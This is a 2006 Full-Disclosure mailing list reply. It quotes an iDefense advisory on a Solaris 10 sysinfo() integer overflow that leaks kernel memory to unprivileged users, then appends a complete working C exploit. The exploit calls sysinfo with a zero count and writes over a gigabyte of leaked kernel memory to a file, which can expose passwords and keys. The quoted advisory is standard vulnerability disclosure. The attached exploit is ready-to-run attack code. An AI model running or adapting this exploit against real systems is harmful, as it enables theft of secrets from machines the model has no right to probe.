Re: Re: [Full-disclosure] iDefense Security Advisory 07.20.06: Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure Vulnerability
Exploit has been attached as problems with site
hosting over weekend.
--- Micheal Turner <wh1t3h4t3@xxxxxxxxxxx> wrote:
>
http://prdelka.blackart.org.uk/exploitz/prdelka-vs-SUN-sysinfo.c
>
> --- labs-no-reply <labs-no-reply@xxxxxxxxxxxx>
> wrote:
>
> > Sun Microsystems Solaris sysinfo() Kernel Memory
> > Disclosure Vulnerability
> >
> > iDefense Security Advisory 07.20.06
> >
>
http://www.idefense.com/application/poi/display?type=vulnerabilities
> > July 20, 2006
> >
> > I. BACKGROUND
> >
> > Solaris is a UNIX operating system developed by
> Sun
> > Microsystems.
> >
> > II. DESCRIPTION
> >
> > Local exploitation of an integer overflow
> > vulnerability in Sun
> > Microsystems Inc. Solaris allows attackers to read
> > kernel memory from a
> > non-privileged userspace process.
> >
> > The vulnerability specifically exists due to an
> > integer overflow in
> > /usr/src/uts/common/syscall/systeminfo.c. The
> > vulnerable code is as
> > follows:
> >
> > 125 if (kstr != NULL) {
> > 126 if ((strcnt = strlen(kstr)) >= count)
> {
> > 127 getcnt = count - 1;
> > 128 if (subyte(buf + count - 1, 0) <
> 0)
> > 129 return (set_errno(EFAULT));
> > 130 } else
> > 131 getcnt = strcnt + 1;
> > 132 if (copyout(kstr, buf, getcnt))
> > 133 return (set_errno(EFAULT));
> > 134 return (strcnt + 1);
> > 135 }
> >
> >
> > If the variable count (which is a value provided
> by
> > the user invoking
> > the function) is 0, the function will call the
> > copyout function with a
> > length argument of -1. Because copyout interprets
> > the length argument as
> > an unsigned integer, a large amount of data will
> be
> > copied out to
> > userspace, well beyond the boundaries that are
> > intended.
> >
> > III. ANALYSIS
> >
> > Successful exploitation of this vulnerability
> allows
> > attackers to read
> > sensitive kernel memory. This can lead to the
> > compromise of passwords or
> > keys. It can also aid an attacker in gathering
> > information for
> > exploitation of other kernel level
> vulnerabilities.
> >
> > IV. DETECTION
> >
> > iDefense has confirmed that Solaris 10 is
> > vulnerable. Earlier versions
> > of Solaris are not affected.
> >
> > V. WORKAROUND
> >
> > iDefense is currently unaware of any workaround
> for
> > this issue.
> >
> > VI. VENDOR RESPONSE
> >
> > Sun Alert ID 102343 addresses this issue and is
> > available at:
> >
> >
> >
>
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102343-1
> >
> > VII. CVE INFORMATION
> >
> > A Mitre Corp. Common Vulnerabilities and Exposures
> > (CVE) number has not
> > been assigned yet.
> >
> > VIII. DISCLOSURE TIMELINE
> >
> > 12/15/2005 Initial vendor notification
> > 12/15/2005 Initial vendor response
> > 07/20/2006 Coordinated public disclosure
> >
> > IX. CREDIT
> >
> > The discoverer of this vulnerability wishes to
> > remain anonymous.
> >
> > Get paid for vulnerability research
> > http://www.idefense.com/poi/teams/vcp.jsp
> >
> > Free tools, research and upcoming events
> > http://labs.idefense.com
> >
> > X. LEGAL NOTICES
> >
> > Copyright © 2006 iDefense, Inc.
> >
> > Permission is granted for the redistribution of
> this
> > alert
> > electronically. It may not be edited in any way
> > without the express
> > written consent of iDEFENSE. If you wish to
> reprint
> > the whole or any
> > part of this alert in any other medium other than
> > electronically, please
> > email customerservice@xxxxxxxxxxxx for permission.
> >
> > Disclaimer: The information in the advisory is
> > believed to be accurate
> > at the time of publishing based on currently
> > available information. Use
> > of the information constitutes acceptance for use
> in
> > an AS IS condition.
> > There are no warranties with regard to this
> > information. Neither the
> > author nor the publisher accepts any liability for
> > any direct, indirect,
> > or consequential loss or damage arising from use
> of,
> > or reliance on,
> > this information.
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter:
> >
>
http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia -
> > http://secunia.com/
> >
>
>
>
>
>
___________________________________________________________
>
> The all-new Yahoo! Mail goes wherever you go - free
> your email address from your Internet provider.
> http://uk.docs.yahoo.com/nowyoucan.html
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
>
http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia -
> http://secunia.com/
>
___________________________________________________________
The all-new Yahoo! Mail goes wherever you go - free your email address from
your Internet provider. http://uk.docs.yahoo.com/nowyoucan.html
/* Sun Microsystems Solaris sysinfo() Kernel Memory Disclosure exploit
* ===================================================================
* Local exploitation of an integer overflow vulnerability in Sun
* Microsystems Inc. Solaris allows attackers to read kernel memory from a
* non-privileged userspace process. The vulnerability specifically exists
* due to an integer overflow in /usr/src/uts/common/syscall/systeminfo.c
*
* Example Use.
* $ uname -a
* SunOS sunos 5.11 snv_30 sun4u sparc SUNW,Ultra-250
* $ ./prdelka-vs-SUN-sysinfo kbuf
* [ Solaris <= 10 sysinfo() kernel memory information leak
* [ Wrote 1294967293 bytes to kbuf
* $ ls -al kbuf
* -rwx------ 1 user other 1.2G Jul 21 23:56 kbuf
*
* -prdelka
*/
#include <sys/systeminfo.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#define bufsize 1294967293
int main(int argc,char* argv[]){
int fd;
ssize_t out;
char* output_buffer;
if(argc < 2){
printf("[ Use with <filepath>\n");
exit(1);
}
printf("[ Solaris <= 10 sysinfo() kernel memory information leak\n");
output_buffer = malloc(bufsize);
memset(output_buffer,0,bufsize);
sysinfo(SI_SYSNAME,output_buffer,0);
fd = open(argv[1],O_RDWR|O_CREAT,0700);
if(fd){
out = write(fd,output_buffer,bufsize);
printf("[ Wrote %u bytes to %s\n",out,argv[1]);
close(fd);
}
exit(0);
}